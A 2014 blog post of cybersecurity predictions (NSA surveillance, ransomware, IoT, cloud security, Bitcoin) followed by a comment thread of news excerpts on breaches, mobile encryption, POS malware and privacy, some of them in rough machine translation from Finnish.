Year 2014 will be a year of cybersecurity after the NSA revelations made in 2013: The headline news is that the NSA has surreptitiously “burrowed its way into nearly all the security architecture” sold by the world’s largest computer networking companies. A lot of people were shocked how NSA monitored and hacked almost everything in Internet. There will still be NSA aftershocks after new material comes out and different parties react to them (and news sources write about them). U.S. cloud services have been put into question for good reason. There will be a lot of NSA spying litigation. Those spying issues will also fuel some haktivism (it has already started to happen).
Security Professionals: Top Cyber Threat Predictions for 2014 article lists the following predictions that seem to pretty propable: Cybersecurity Regulatory Efforts Will Spark Greater Need for Harmonization, Service-Impacting Interruptions for Online Services Will Persist, We Will See an Increase in Cybercrime Activity Related to the World Cup, Rise of Regional Cloud Services, Dev-Ops Security Integration Fast Becoming Critical, Cybercrime that Leverages Unsupported Software will Increase, Increase in Social Engineering and Ransomware will Impact More People.
Ubiquitous mobile computing is all around us, which will lead to increased risks and concerns about social network privacy. Social networks have quickly become the key organizing principle of Internet communication and collaboration. Android anti-virus apps CAN’T kill nasties on sight like normal AV.
2013 was a very hacked year when there was many cases where information on millions or tens of millions of users were stolen from companies. It’s likely that we will see much more of the same in 2014, the way people use passwords and how the on-line services are built have not changed much in one year.
Gartner predicts that through 2014, improved JavaScript performance will begin to push HTML5 and the browser as a mainstream enterprise application development environment. I expect that HTML5 related security issues are increased due the fact that the technology being used more in 2014.
Over 50% of net traffic to web sited made by bots! More Than Half of Internet Traffic Is Just Bots article says that security and cloud service provider Incapsula analyzed and found out that more than 60 percent of internet traffic is computer generated, compared to less than 40 percent of traffic that is driven by human clicks. 31% of Bots Are Still Malicious. SEO link building has always a major motivation for automated link spamming, but it is decreasing due the fact that Google was able to discourage it. There are more advanced hacking and automatic vulnerability searching.
DDoS attacks are evolving from volumetric Layer 3-4 attacks to much more sophisticated and dangerous Layer 7 multi-vector threats.
There will be still many SCADA security issues in 2014. Even though traditional SCADA vulnerabilities have become easier to find, the increased connectivity brought with IoT will cause new issues. And there will still be very many controls systems openly accessible from the Internet for practically everybody who knows how to do that. There was a large number of SCADA systems found open in Internet in the beginning of 2013, and the numbers have not considerably dropped during the year. I expect that very many of those systems are still too open in the end of 2014.
The Internet is expanding into enterprise assets and consumer items such as cars and televisions. The Internet of Things (IoT) will evolve into the Web of Things, increasing the coordination between things in the real world and their counterparts on the Web. There will be many security issues to solve and as the system become more widely used more security issues on them will be found in them.
Cloud security will be talked about. Hopefully there will be some clear-up on the terminology on that area, because cloud security can mean a lot of things like the term cloud computing. Cloud security could mean how secure your cloud provider is, a service that runs on cloud filtering what comes through it (for example e-mails, web traffic), it could mean to product protecting some service running on cloud, or it could be a traditional anti-virus service that connects to cloud to advance it’s operation (for example update in real-time, verify unknown programs based on data on cloud). Research firm Gartner forecasts that cloud security sales will increase dramatically in the next few years. Cloud Security sales have increased over the past year by 2.1 billion to $ 3.1 billion in 2015.
Marketers try to put “cloud” term to security product brochures as much as they can. Cloud made from the traditional information security sound old-fashioned because companies are under pressure to move services to the cloud. Also, mobile devices and information security dispersed users to set new standards. OpenDNS ‘s CTO Dan Hubbard says that “Because of the data and equipment run in the cloud users with the cloud is the best way to protect them.” The Snowden Effect will also bring this year of PRIVATE cloud talk on table for security reasons because U.S. cloud services have been put into question for good reason.
In Finland a new Cyber Security Center started in the beginning of 2014. Security articles and warnings from it will be published at kyberturvallisuuskeskus.fi.
Late addition: Crypto-currencies like Bitcoin and similar are on the rise. Early adopters already use them already actively. Those crypto-currencies have many security related issues related to them. The values of the crypto-currencies vary quite much, and easily the value drops considerably when they get so used that different governments try to limit using them. Bitcoin is increasingly used as ramsonware payment method. Bitcoins have been stolen lately quite much (and I expect that to increase when usage increases), and those are stolen from users, on-line wallets and from exchanges. When more money is involved, more bad guys try to get into to get some of it. Sometimes bad guys do not try to steal your money, bit use resources you pay (your own PC, your server capacity, etc.) to generate money for them without you knowing about it. If you plan to use those crypto-currencies be careful to understand what you are doing with them, there is a real possibility that you can loose your money and there is no way that lost money can be recovered.
3,382 Comments
Tomi Engdahl says:
Comcast Wi-Fi serving self-promotional ads via JavaScript injection
The practice raises security, net neutrality issues as FCC mulls Internet reforms.
http://arstechnica.com/tech-policy/2014/09/why-comcasts-javascript-ad-injections-threaten-security-net-neutrality/
Comcast has begun serving Comcast ads to devices connected to one of its 3.5 million publicly accessible Wi-Fi hotspots across the US. Comcast’s decision to inject data into websites raises security concerns and arguably cuts to the core of the ongoing net neutrality debate.
The Comcast advertising campaign came to Ars’ attention after Ryan Singel, the co-founder of startup Contextly, was reading Mediagazer at a café in the North Beach neighborhood of San Francisco on Labor Day.
A small red advertisement saying “XFINITY WiFi Peppy” scooted across the bottom of the Mediagazer page and disappeared into the ether. It happened a few times, he said. Singel took screen shots of the advertisement loading and as it appeared on his screen. He captured some code, too.
“When a user requests to view a page, Comcast injects its JavaScript into the packets being returned by the real server,” Singel said during an instant-message chat.
Tomi Engdahl says:
Facebook, the security company
CSO Joe Sullivan talks about PrivateCore and Facebook’s homegrown security clout.
http://arstechnica.com/security/2014/08/facebook-the-security-company/
A VM in a vCage
The technology PrivateCore is developing, vCage, is a virtual “cage” in the telecom industry’s usage of the word. It is software that is intended to continuously assure that the servers it protects have not had their software tampered with or been exploited by malware. It also prevents physical access to the data running on the server, just as a locked cage in a colocation facility would.
The software integrates with OpenStack private cloud infrastructure to continuously monitor virtual machines, encrypt what’s stored in memory, and provide additional layers of security to reduce the probability of an outside attacker gaining access to virtual servers through malware or exploits of their Web servers and operating systems. If the “attestation” system detects a change that would indicate that a server has been exploited, it shuts it down and re-provisions another server elsewhere. Sullivan explained that the technology is seen as key to Facebook’s strategy for Internet.org because it will allow the company to put servers in places outside the highly secure (and expensive) data centers it operates in developed countries.
“We’re trying to get a billion more people on the Internet,” he said. “So we have to have servers closer to where they are.”
By purchasing PrivateCore, Facebook is essentially taking vCage off the market. The software “is not going to be sold,” Sullivan said. “They had a couple of public customers and a couple of private ones. But they took the opportunity to get to work with us because it will develop their technology faster.”
Sullivan said the software would not be for sale for the foreseeable future. “The short-term goal is to get it working in one or two test-beds,“
It’s been 18 months since Facebook was hit by a Java zero-day that compromised a developer’s laptop. Since then, Facebook has done a lot to reduce the potential for attacks and is using the same anomaly detection technology the company developed to watch for fraudulent Facebook user logins to spot problems within its own network and facilities.
The Java zero-day, he said, “drove home that it’s impossible to secure an employee’s computer 100 percent.” To minimize what an attacker can get to, Facebook has moved virtually everything that employees work with into its own cloud—reducing the amount of sensitive data that resides on individual employees’ computers as much as possible.
Tomi Engdahl says:
iPwned: How easy is it to mine Apple services, devices for data?
High-end tools, simple hacks can still make iPhone data less private than we’d like.
http://arstechnica.com/features/2014/09/ipwned-mining-iphones-icloud-for-personal-data-is-terrifying-simple/
Tomi Engdahl says:
New website aims to publicly shame apps with lax security (UPDATED)
Appropriately named HTTP Shaming IDs apps and Web services operating without
http://arstechnica.com/security/2014/08/new-website-aims-to-shame-apps-with-lax-security/
The amount of personal data traveling to and from the Internet has exploded, yet many applications and services continue to put user information at risk by not encrypting data sent over wireless networks. Software engineer Tony Webster has a classic solution—shame.
Webster decided to see if a little public humiliation could convince companies to better secure their customers’ information. On Saturday, the consultant created a website, HTTP Shaming, and began posting cases of insecure communications, calling out businesses that send their customers’ personal information to the Internet without encrypting it first.
So far, TripIt and 18 other applications and services have made the shaming list, many submitted by other people fed up with the security missteps of companies, Webster says.
“I’ve kind of been overwhelmed in a sad but also in a good way with the number of submissions,” he says. “Some of them are fairly benign, but I’ve gotten some that are quite concerning to me, especially those that relate to financial details.”
Webster will not publish information on the more critical cases, opting instead to reach out first to the vendors, he says.
The lax security of mobile applications and Web services is nothing new. In July, application-management firm Appthority noted that about four out of every five mobile apps did something that put the user’s data at risk, including tracking location, collecting data on the user, and sending information to social networks or advertising affiliates. In January, a researcher at security firm ioActive found that 36 out of 40 banking applications had some unencrypted links.
Worse, many companies do not use the secure version of the Web protocol, known as HTTPS, to secure their data. Out of 2,100 mobile applications from 600 companies, 18 percent did not encrypt data communications, according to an HP research published in December 2013.
Those numbers are concerning, Webster says.
“It seems ridiculous to me that in 2014 we are still sending unencrypted data over the air,” he says. “And there is no reason, in my mind, why all websites and mobile apps should not be using HTTPS.”
Tomi Engdahl says:
Putin To Discuss Plans For Disconnecting Russia From the Internet
http://yro.slashdot.org/story/14/09/19/1752208/putin-to-discuss-plans-for-disconnecting-russia-from-the-internet
According to various reports, the officials will make a number of decisions about regulating the use of the Internet in Russia. This includes the ability to cut off the Russian Internet, known as Runet, from the outside world, in case of emergency.
Tomi Engdahl says:
Your iOS 8 Data is Not Beyond Law Enforcement’s Reach… Yet.
http://www.zdziarski.com/blog/?p=3875
In a recent announcement, Apple stated that they no longer unlock iOS (8) devices for law enforcement.
This is a significantly pro-privacy (and courageous) posture Apple is taking with their devices, and while about seven years late, is more than welcome. In fact, I am very impressed with Apple’s latest efforts to beef up security all around, including iOS 8 and iCloud’s new 2FA. I believe Tim Cook to be genuine in his commitment to user privacy
In a recent blog post, I outlined a number of measures Apple took with iOS 8 to prevent many forensic artifacts from being dumped off of the device by existing commercial forensics tools. These services had completely bypassed the user’s backup encryption password, affording the consumer virtually no protection from the many law enforcement forensics tools that took advantage of these vulnerabilities. Apple closed off many of these services in iOS 8. This was a great start to better securing iOS 8, but not everything has been completely protected.
In addition to what’s been fixed, I also outlined some things that haven’t yet been.
What’s left are services that iTunes (and Xcode) talk to in order to exchange information with third party applications, or access your media folder.
This, unfortunately, also opens up the capability for law enforcement to also use this mechanism to dump:
Your camera reel, videos, and recordings
Podcasts, Books, and other iTunes media
All third party application data
Existing commercial forensics tools can still acquire these artifacts from your device, even running iOS 8. I
Tomi Engdahl says:
Apple And Google Will Force A Legal Battle Over The Privacy Of Your Passcode
http://www.forbes.com/sites/kashmirhill/2014/09/19/apple-and-google-privacy-of-your-passcode/
Apple AAPL -0.82% wants the world to know that it’s really, really serious about privacy. Accompanying the launch of the iPhone 6 and iOS 8
Apple is getting serious about privacy because it has to. It wants the iPhone to become the only thing you need beyond oxygen. The iPhone is not just for communication and web browsing anymore. It wants to track your health (with HealthKit), be your wallet (with Apple Pay), and control the devices in your home (with HomeKit). Depending on how personalized the iPhone 6′s vibration capabilities get, it could be your iSignificantOther. This is all set against the backdrop of concern about tech companies’ guardianship of our personal information amid the Snowden leaks.
So now, if law enforcement wants into your phone, they’ll need to get you to enter your passcode. One Apple competitor felt the heat. Google-owned Android quickly issued an “us, too!” announcement, saying that its next operating system will also encrypt data on smartphones by default for those using a passcode. Privacy advocates are thrilled.
But former federal prosecutor and legal expert Orin Kerr was not thrilled. He says that if the po-po have a warrant, they should be able to get into a phone, and that Apple is making it harder for them to conduct lawful searches. People encrypting the content of their devices is not common practice now, but moving forward, it could become widespread, and law enforcement will have to force people to hand over or enter their passcodes in order to get evidence from those devices. That’s where the legal showdown will happen.
“If the government obtains a subpoena ordering the person to enter in the passcode, and the person refuses or falsely claims not to know the passcode, a person can be held in contempt for failure to comply,” writes Kerr.
Kerr thinks the Fifth Amendment shouldn’t protect people against decrypting evidence that will be used against them
So expect legal firewords ahead….
Or not. It may be that the passcode doesn’t wind up protecting people as much as you might
Tomi Engdahl says:
Bitcoin tanks, is Alibaba to blame?
http://www.cnbc.com/id/102016503
The price of bitcoin has plummeted in the past few days, and some are blaming the Alibaba IPO for the virtual currency’s fall.
Touching as low as $381.17 earlier Friday, bitcoin is trading at a far cry from its position around $513 less than a month ago or nearly $650 in July.
Tomi Engdahl says:
There’s no escape!
The pocket-sized spy drone with a 360 degree camera that can fly through windows and navigate tunnels
Tiny hexacopter measures about seven inches
Has been backed by US Air Force who plan to use it to look for IEDs
Carries a panoramic camera that provides 360-degree view from the drone.
Read more: http://www.dailymail.co.uk/sciencetech/article-2761257/There-s-no-escape-The-pocket-sized-drone-360-degree-fly-windows-tunnels.html#ixzz3DsPUuKuQ
Tomi Engdahl says:
The Dark Web Gets Darker With Rise of the ‘Evolution’ Drug Market
http://www.wired.com/2014/09/dark-web-evolution/
In the digital drug trade as in the physical one, taking out one kingpin only makes room for another ready to satisfy the market’s endless demand. In the case of the FBI’s takedown of the Silk Road, the latest of the up-and-coming drug kingpins is far more evolved than its predecessor—and far less principled.
Since it launched early this year, the anonymous black market bazaar Evolution has grown dramatically, nearly tripling its sales listings in just the last five months. It now offers more than 15,000 mostly illegal products ranging from weapons to weed, cocaine, and heroin. That’s thousands more than the Silk Road ever hosted. And Evolution’s popularity has been driven not only by a more secure and professional operation than its competitors, but also by a more amoral approach to the cryptomarket than the strict libertarian ethos the Silk Road preached. Case in point: About 10 percent of Evolution’s products are stolen credit card numbers and credentials for hacked online accounts.
That development represents an unsavory departure from the Silk Road’s rule that only “victimless” contraband could be sold through its anonymous black market—a sign that the traditional cybercriminal underground sees an opportunity to merge its identity theft business with the widening online trade in narcotics.
Tomi Engdahl says:
Ex-Employees Say Home Depot Left Data Vulnerable
http://www.nytimes.com/2014/09/20/business/ex-employees-say-home-depot-left-data-vulnerable.html?_r=0
The risks were clear to computer experts inside Home Depot: The home improvement chain, they warned for years, might be easy prey for hackers.
But despite alarms as far back as 2008, Home Depot was slow to raise its defenses, according to former employees. On Thursday, the company confirmed what many had feared: The biggest data breach in retailing history had compromised 56 million of its customers’ credit cards. The data has popped up on black markets and, by one estimate, could be used to make $3 billion in illegal purchases.
Yet long before the attack came to light this month, Home Depot’s handling of its computer security was a record of missteps, the former employees said.
In recent years, Home Depot relied on outdated software to protect its network and scanned systems that handled customer information irregularly, those people said. Some members of its security team left as managers dismissed their concerns. Others wondered how Home Depot met industry standards for protecting customer data. One went so far as to warn friends to use cash, rather than credit cards, at the company’s stores.
And yet, two former employees said, while Home Depot data centers in Austin, Tex., and Atlanta were scanned, more than a dozen systems handling customer information were not assessed and were off limits to much of the security staff.
“Scanning is the easiest part of compliance,” said Avivah Litan, a cybersecurity analyst at Gartner, a research firm. “There are a lot of services that do this. They hardly cost any money. And they can be run cheaply from the cloud.”
Tomi Engdahl says:
Samsung drops Knox prices and introduces Knox user portal
Employees using ActiveSync can install My Knox without an IT admin
http://www.computerworld.com/article/2686154/samsung-drops-knox-prices-and-introduces-knox-user-portal.html
Samsung on Thursday announced price reductions and updates for its Knox security and management software for IT shops and a free My Knox service that is directly available to professionals using ActiveSync.
My Knox can be installed on a user’s Galaxy S5 or Galaxy Note 4 smartphone without an IT administrator’s involvement to set up a My Knox User Portal to remotely find, wipe and lock a device, according to a Samsung blog.
With My Knox, professionals can synchronize emails, calendar events and contacts between desktop computers and mobile devices, Samsung said. It creates a virtual Android partition within the mobile device that has its own home screen, launcher, apps and widget.
“If you are looking for a free security solution that ensures your privacy while providing the simplicity of having a secure workspace for email and apps that is managed by you, look no further than My Knox,” Samsung’s blog says.
“Knox Premium will be attractive to businesses because of its low cost and it will address concerns that Knox is expensive and not affordable,”
Knox Express will also have Knox EMM, and will have an online portal for IT admins with support for Samsung and other Android and iOS devices, Samsung said.
Take control of your mobile device for work with Samsung My KNOX
https://www.samsungknox.com/en/blog/take-control-your-mobile-device-work-samsung-my-knox
Calling all employees, we’ve got something for you! We’re introducing our newest option for business users with essential mobile device security needs: My KNOX. If you’re concerned with maintaining your privacy while securely keeping company data on your device, My KNOX has got you covered. My KNOX is designed for professionals in enterprises with Microsoft Exchange ActiveSync (EAS) accounts, so that you can synchronize emails, calendar events, and contacts between desktop computers and mobile devices. My KNOX is simple to set up, secure, and free!
Tomi Engdahl says:
The chip alone does not protect against credit card hacks
When the United States to pay by credit card, always gets nervous, cyber criminals hijack card information immediately to trade the system. Why Finland does not become a public card data theft?
“We have smart cards, in the States does.” This in Finland it is customary to say, when the news that the United States, criminals have again been hijacked millions of payment cards with information on the systems.
Source of the United States: There debit card information has reached the large numbers of criminals. Attacks, cybercriminals are ujuttaneet malicious transactions in payment systems. Target and Home Depot, the systems have been found Blackpose malware variants.
Could something similar happen sometime in Finland?
“In many cases in Finland reaction is that there could be, because we are used to chip cards. I think it is still possible that in Finland We’ll start our sales terminals,” the security company Trend Micro, Finland and the Baltic Kimmo Vesajoki says Tiville.
“EMV chip cards or debit cards will not be able to prevent the payment terminals occurring in the so-called ram-mopping-based attacks,” Trend Micro’s report says.
The United States and many other countries in payment systems is a serious weakness: Card Data processing ram memory merchant’s computer or on a server.
At that moment, when the user enters a debit card trade card reader, the data is transmitted to the merchant’s own cashier or merchant’s server to your computer. Central memory card data are vanishingly small moment in an unencrypted format before they are encrypted. If a terminal is malware, it will automatically detect when the main memory should be specifically credit card information and collect them in a lightning recovery.
“Card payments pci dss -tietoturvastandardi requires that the card data must be encrypted if they are saved or transmitted by the network. Therefore, the data collected from the main memory before they are encrypted”
Trend Micro said already the end of August before the Home Depot-news that it has detected a Blackpose-new versions of the malware. They pretend to McAfee’s security agents of the program and hit the main memory.
Card readers in the United States are almost everywhere in the magnetic lines of the readers. Would the chip card and smart card reader ram attack the use of?
“The chip card has no additional security if the theft takes place in the main memory. The chip card primarily to prevent physical copy, but not the card information in the online store, ”
“The chip card technology alone does not preclude the central memory of attacks, which is accentuated by the news of recent break-ins. Protection needed for other methods,” says Electronic payment International Organization for Standardization PCI’s director Bob Russo.
Ram attack is successful in spite of the chip, if the data are exported to the merchant’s computer in the same way as magnetic stripe reading.
The chip can be read from the card holder’s name, card number and expiration date. Just these data without cvv2 code is sufficient in some online shopping, so they are valid for criminals. Information is also collected successfully. It hints at the fact that the UK has moved to chip cards, but according to Trend Micro will become more common card payment fraud involving the use of the card data without a physical card, ie online.
Card payment company Nets risk management expert Pekka Vermasvuo, however, says that the memory read malware in Finland do not get a card access to information. The reason for this is that here in the card payment transaction processing as a whole is done safely chip payment terminal and card information transmitted unencrypted kassatyöasemalle.
“We estimate that in Finland all the available modern chip card terminal systems operate according to this principle and are not susceptible to such attacks,”
“Among them, the card information is never go to the dealer in your system and data running on the merchant’s online all unencrypted. In the States a card reader transmits the information to Checkout that is running Windows XP or Linux workstation, while in Finland the data do not go to the workstation,”
In segregated system, the card reader is not just a dumb terminal, such as the United States. The chip payment terminal is the small computer, which encrypts card data the same way own their shells within. It’s talking directly to the card issuer’s systems. Cashier must only provide knowledge of the total price to be paid.
Encryption solution uses the term end to end encryption, p2pe.
Transaction recipient to decrypt, verify card authenticity, validity and accuracy of the pin-code and makes charge reservation. Retail System does not get any sensitive any card data, only the acknowledgment made the payment and the same identity that appear on the customer’s receipt.
“Implementation is a common practice in Finland, and it is used by, for example, the largest grocery chains. It can be estimated that almost all of Finland’s card payments are transmitted to this day from end to end encrypted,”
“Even the trader himself is not able to break into the card information, or listen to the traffic,”
“The States the payment process is a POS system, when we have it is differentiated and it only transmits an acknowledgment to the POS system. Risks are of course not zero, but they are clearly lower. In the United States have woken up to the payment security very late, but I know that the situation is going to change quite a lot, ”
Finland is still weak systems for small businesses (cafes, restaurants and shops), which have not been updated for some years. They card information may be further addressed, and to collect locally. A particularly clear warning sign is the fact that there is only a magnetic stripe reader.
Finland Visa and MasterCard payment card company representative says the Nets Tiville that even small merchants do not have to worry about. Chip Card environments have moved broadly, that is, the card information goes only to the card transaction to the recipient.
“In addition, p2pe implementation is also widely used for small traders. It represents a significant part of the New installations both large and small retailers, ”
The Nordic countries, from end to end encryption and separate systems are widely used. The situation in other parts of the world, Niki Klaus does not know exactly, but in any case, the situation is considerably more diverse.
Even the chip card does not give certainty. It only guarantees the payment entity. Many of the world sold the chip card readers do not support end to end encryption.
If you travel, credit card transactions worth a go through carefully and regularly. Especially for small purchases should be checked because of this reason: Criminals do with stolen credit card information initially only small less than $ 10 test purchases to check whether they can be utilized. If the transaction is successful, it will raise the black market card information to a higher price point….
Source: http://summa.talentum.fi/article/tv/uutiset/91615
Tomi Engdahl says:
Special pleading against mass surveillance won’t help anyone
Protecting journalists alone won’t protect their sources
http://www.theregister.co.uk/2014/09/21/ripa_surveillance_special_pleading_for_journalists_pointless/
This is shameful. We Britons once prided ourselves on being a free, tolerant and democratic society. Yet without the freedom to send and receive information – yes, even info which threatens public sector employees’ pensions – we stand in grave danger of having our freedoms and best interests overridden by a self-serving elite, safely insulated from the public thanks to focus groups and chauffeur-driven cars, fuelled by taxpayer-funded expense accounts.
Tomi Engdahl says:
‘Kim Kardashian snaps naked selfies with a BLACKBERRY’. *Twitterati gasps*
More alleged private, nude celeb pics appear online
http://www.theregister.co.uk/2014/09/21/kim_kardashian_naked_selfies_allegedly_leaked_online/
A new round of what appear to be private, naked photos of female celebrities including US television reality star Kim Kardashian have apparently been leaked online.
The latest stash of pics, which seemed to include two naked selfies taken by Kardashian with a Blackberry handset, were easily accessible on Twitter late on Saturday night.
- are real or fake
So what of Kardashian’s Blackberry, then? Some have suggested that the alleged naked selfies could be a few years old and that the photos may since have been uploaded to a cloud service.
Tomi Engdahl says:
Vilified Bitcoin Tycoon After Losing $500 Million: My Life Is at Risk
http://www.thedailybeast.com/articles/2014/09/17/mt-gox-s-karpeles-on-losing-a-half-billion-bucks-in-bitcoins.html
In the first interview with Mt. Gox’s Mark Karpeles since Japanese police launched an investigation into his bankrupt exchange, he says he’s just a regular geek—and that he’s in danger.
TOKYO, Japan — What was once the world’s largest bitcoin exchange, Mt. Gox, filed for bankruptcy protection in February this year after disclosing that a half-billion dollars worth of virtual currency had disappeared into the blue, allegedly hacked.
The bitcoin community and press have vilified Mark Karpeles, the CEO of Mt. Gox, as a clown and a con man. The Japanese tabloid magazines have portrayed him as a “beast” hiding in his “dungeon” in Tokyo’s Meguro City.
But who is he really?
A source close to the police investigation says the case is being looked at as one in which “Mt. Gox is the victim of a crime, rather than perpetrator of a crime.”
Tomi Engdahl says:
Taking the No Out of Innovation
http://mds.ricoh.com/knowledge-center/blog/taking-the-no-out-of-innovation
“The solution to mitigating the risk is not to stop sharing and collaboration, which is essential to a productive workplace. Rather it is putting solutions in place that will keep these documents secure without requiring draconian end-user security measures that will stifle productivity.”
Sounds great, but the question is how?
But this does require IT to step out of its traditional role of support and to be proactive about initiating that dialog, to reach out to Line of Business innovators. It may feel counter-intuitive, but success requires IT security to encourage reorganizing processes around enabling innovation and creating business value.
It is true many enterprises already include IT security as part of the teams that review current document and information processes. But I am advocating that IT security should collaborate with innovative domain experts or departmental managers as early as possible.
This subtle change shifts IT security’s focus, and importantly, perception by others, from gate-keeping to helping teams predict risks, estimating risk-reduction costs, and jointly finding productive and secure solutions.
Success does take time. And as I stated above, this does require new skills on the part of IT security. For example, the ability to communicate with non-security practitioners; and a better understanding of the business drivers and the way others think in different functional areas
Tomi Engdahl says:
Your location info is too revealing: data boffins
Anonymity by a thousand cuts
http://www.theregister.co.uk/2014/09/22/your_location_info_is_too_revealing_data_boffins/
A group of researchers partly supported by SAP has taken a look at one of the big problems with so-called “anonymised” data: the way spatial correlations in mobile data can be used to re-identify individuals in large data sets.
Location data is the big problem, the Singapore-led group says: even if the resolution of a phone’s GPS records is reduced in a stored dataset, following a user’s track (trajectory in the paper) for long enough will easily identify that user.
“Removing identifiers from location information, or reducing the granularity of the location or time, does not prevent disclosure of personally identifiable information,” the paper states. “Individuals are highly re-identifiable with only a few spatio-temporal points”.
Just how revealing location trajectories are is revealed in their analysis of 56 million records: “with two random points, more than 60 per cent of the trajectories are unique”, they write.
Tomi Engdahl says:
CloudFlare ditches private SSL keys for better security
‘Sorry, spooks, we can’t decrypt this for you’
http://www.theregister.co.uk/2014/09/22/cloudflare_ditches_keys_for_better_security/
CloudFlare has announced the outcome of what it says is two years’ work – switching on Keyless SSL – which lets customers encrypt their web traffic via the company’s services without having to hand over their private SSL keys.
In this blog post announcing the service, cofounder and CEO Matthew Prince explains that “the only way organisations that had the highest standards of SSL security could ever adopt the benefits of the cloud is if we never took possession of their SSL keys.”
In the handshakes used to negotiate an SSL session, he writes, “the private key is only used once in each handshake. This allows us to split the TLS handshake geographically, with most of the handshake happening at CloudFlare’s edge while moving the private key operations to a remote key server”.
With the key server under the customer’s control, the company says, they have “exclusive access to the private key”.
Tomi Engdahl says:
CloudFlare’s Keyless SSL Server Reference Implementation
https://github.com/cloudflare/keyless
Tomi Engdahl says:
Home Depot admits 56 million card details were stolen
Smashes Target’s record
http://www.theinquirer.net/inquirer/special/2371244/home-depot-admits-56-million-card-details-were-stolen
DO IT YOURSELF RETAILER Home Depot has completed an investigation of its recent server breach and reported that some 56 million unique payment card accounts were stolen.
The firm said that there is no evidence that the hackers made off with any PIN numbers, but has offered its customers credit services. It predicted that its own financial damage will be $62m.
Tomi Engdahl says:
A day in the life of a data mined kid
http://www.marketplace.org/topics/education/learningcurve/day-life-data-mined-kid
Education, like pretty much everything else in our lives these days, is driven by data.
Our childrens’ data. A whole lot of it.
Nearly everything they do at school can be — and often is — recorded and tracked, and parents don’t always know what information is being collected, where it’s going, or how it’s being used.
The story begins at the bus stop.
Your child swipes his ID card and climbs on the bus. The card may contain an RFID or radio frequency identification chip, which lets the school know when he gets on and off the bus. In some school districts, parents will get text alerts, letting them know their child arrived safely to school. The bus technology is presented as a way to keep children safer.
“The data collection begins even before he steps into the school,” says Khaliah Barnes, director of the Student Privacy Project at the Electronic Privacy Information Center.
And, says Barnes, in some schools it just keeps on going. RFID chips let schools track kids on school grounds. Administrators could know if a child leaves the building, or if he visits the school counselor.
“The issue is that this reveals specifically sensitive information,” says Barnes.
Location information is just one small part of a child’s data file.
In the classroom, teachers gather data on routine things like attendance, tardiness, test scores and grades. The kinds of records that used to be kept on paper.
The government isn’t the only one trying to figure out what’s working by investing in and gobbling up data about your kid.
Sales of educational technology software for kids in kindergarten through high school reached nearly $8 billion last year, according to the Software and Information Industry Association.
One of the biggest players is the field is Knewton. It analyzes student data that it collects by keeping track of nearly every click and keystroke your child makes during digital lessons.
Knewton claims to gather millions of data points on millions of children each day. Ferreira calls education “the world’s most data-mineable industry by far.”
“We have five orders of magnitude more data about you than Google has,” he says in the video. “We literally have more data about our students than any company has about anybody else about anything, and it’s not even close.”
Five orders of magnitude more data than Google is a whole lot of data.
Teachers are increasingly relying on behavior monitoring software not only to keep kids on track, but to track them, too.
“We live in a 24/7 data mining universe today,” says Jim Steyer, CEO of Common Sense Media. “And I think most of us parents and teachers and kids don’t realize how much of our data is out there and used by other people.”
At lunch, a child may use her ID to pay for her mini-cheeseburgers.
Cafeteria software might also track exactly what she eats
In gym class, some kids strap on heart-rate monitors, which record how hard they are working out.
Other kids are asked to wear Fitbit-style wrist bands that record their activities at school, on the playground and at home — where the data grab continues.
Many schools have installed tracking technology on school-owned computers as a security measure. The technology allows schools to see where a kid is logging in from, via an IP address.
Tomi Engdahl says:
“People are afraid, but do not know what” – information security was the concern of everyone
Data Burglary and cloud threats are now all the people in the consciousness. But how to get ordinary people set it up without having to manually adjust any complicated settings?
Security. The magical compound word, which a few years ago meant the machine hall for men or propellihattujen cryptic tinkering.
Not any more. Now, security is everywhere. Sometimes it appears, sometimes it does not. Nowhere, however, is reflected in its lack, such as the recent media coverage has revealed.
Darmon, says that a few years ago his friends did not understand what he does for a living. But the world has changed rapidly. Darmon tells how he realized the security entered into the ordinary people of the world.
the 2011 Playstation breakthrough that put the PSN network out of the game the 24-day period.
After this, Darmon has had to answer questions about their friends, whether their machine may have hijacked. The answer is usually a form of “yes, but the target is not you, but your machine, for example, spammers use”.
If possible, the recent American celebrity nude photo leak of Apple’s cloud has shocked ordinary people’s basic security even more. Whether some of the cases already had time to call it security 9/11.
- There is a company’s responsibility to ensure its customers’ information security. Many people do not do it properly, Darmon busted companies, however, without naming.
- People are afraid, but do not know what.
It is not a mere intrusions and data theft. Holiday pictures posted to cloud can tell that apartment is empty.
Data security getting in the public consciousness Darmon sees an opportunity for change.
- After all, we are all consumers, the business world. Therefore, it is only natural that the development goes from there to consumers.
Check Point solution is based on the fact that mobile devices, the communication passes through the tunneled to online gateway servers that run a copy of the company available on the network security practices. Only then the traffic is directed to the Internet.
- We do not want people to adjust the device settings, and people need to make adjustments yourself.
As the traffic filtering is done in the cloud, the mobile device only runs a lightweight client software. In addition, the mobile device content may be cleaved into separate volumes.
Current consumer clouds laws often the availability/useability over safety. Darmon believes that this is changing.
- Security is like a seat belt in cars. First, the opposition, it is now used by all. Nowadays, people want their car airbags.
Do not violate the privacy of the network, only criminals. Break into systems and eavesdropping will also make the authorities. Security companies’ attitude to this is diverse.
Source: http://www.itviikko.fi/tietoturva/2014/09/18/ihmiset-pelkaavat-mutteivat-tieda-mita–tietoturvasta-tuli-jokaisen-huoli/201412937/7?rss=8
Tomi Engdahl says:
Naked pictures’ of Kim Kardashian and others ‘leaked’
21 September 2014 Last updated at 11:06
http://www.bbc.co.uk/newsbeat/29300374
More pictures and videos which seem to show celebrities naked have been posted online.
It’s thought to be the second massive hacking-related leak in less than a month, but it’s not clear yet where the pictures came from.
They were briefly posted on 4chan and Reddit before being removed, according to reports.
Apple called the first hack a “targeted attack” but denied its iCloud storage system had been compromised.
It suggested the celebrities had their accounts hacked by using easy-to-guess passwords or giving up personal data to cyber criminals posing as Apple.
Tomi Engdahl says:
Researchers Propose a Revocable Identity-Based Encryption Scheme
http://it.slashdot.org/story/14/09/22/0243225/researchers-propose-a-revocable-identity-based-encryption-scheme
Identity-based public key encryption works on the idea of using something well-known (like an e-mail address) as the public key and having a private key generator do some wibbly-wobbly timey-wimey stuff to generate a secure private key out if it.
the paper notes that security has been a big hassle in IBE-type encryption, as has revocation of keys. The authors claim, however, that they have accomplished both.
Anyways, this is not the only cool new crypto concept in town, but it is certainly one of the most intriguing as it would be a very simple platform for building mostly-transparent encryption into typical consumer apps.
An Efficient and Provable Secure Revocable Identity-Based Encryption Scheme
http://www.plosone.org/article/info%3Adoi%2F10.1371%2Fjournal.pone.0106925
